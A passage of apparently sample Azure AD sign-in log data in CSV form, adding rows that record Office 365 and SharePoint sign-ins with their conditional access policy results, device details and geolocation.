JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5ef5316a-deee-4f03-8fd7-4abf4fb11300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5ef5316a-deee-4f03-8fd7-4abf4fb11300,SigninLogs,Sucess,41.90428925,-85.99833679
+1011,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:07.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,438d89ff-6d2f-4b8d-bc83-3c99d5716251,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5ef5316a-deee-4f03-8fd7-4abfaeb11300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5ef5316a-deee-4f03-8fd7-4abfaeb11300,SigninLogs,Sucess,41.90428925,-85.99833679
+1012,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:27.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a4118d43-8339-4d8d-897e-e04bb022ae68,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c6df9c5c-6712-4175-a3db-58ce75881400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c6df9c5c-6712-4175-a3db-58ce75881400,SigninLogs,Sucess,33.7984581,-84.38828278
+1013,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:23.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7c575f55-8526-4ecc-875e-cba78a455044,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",93ca542e-4eab-45c4-8608-b71578d11400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,93ca542e-4eab-45c4-8608-b71578d11400,SigninLogs,Sucess,33.7984581,-84.38828278
+1014,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:55.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0ecd469f-40d9-0000-5683-46dd031b9ad5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",48cf7de2-e659-4e20-aee0-25dc1dde1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,48cf7de2-e659-4e20-aee0-25dc1dde1400,SigninLogs,Sucess,33.7984581,-84.38828278
+1015,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:47.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5c5e60be-0296-4fc6-bbb2-9ca593cfa831,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eab2e251500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3b0e5c51-5aba-4adb-89c0-6eab2e251500,SigninLogs,Sucess,41.90428925,-85.99833679
+1016,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:13.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc294554-290e-4b6b-a8b1-94fa36df2bb5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",24b904d7-063a-4f4c-9637-40c7524d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,24b904d7-063a-4f4c-9637-40c7524d1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1017,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:54.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,98cc469f-40db-0000-54b3-3e2255a3e1d9,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:25,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",429b44fe-fb38-41be-832c-f142dbc21200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,429b44fe-fb38-41be-832c-f142dbc21200,SigninLogs,Sucess,41.90428925,-85.99833679
+1018,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:53.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,920963ee-487f-4754-b3fe-30f69858fc29,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:41,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",4445394f-bc55-4988-8502-680d73041600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,4445394f-bc55-4988-8502-680d73041600,SigninLogs,Sucess,41.90428925,-85.99833679
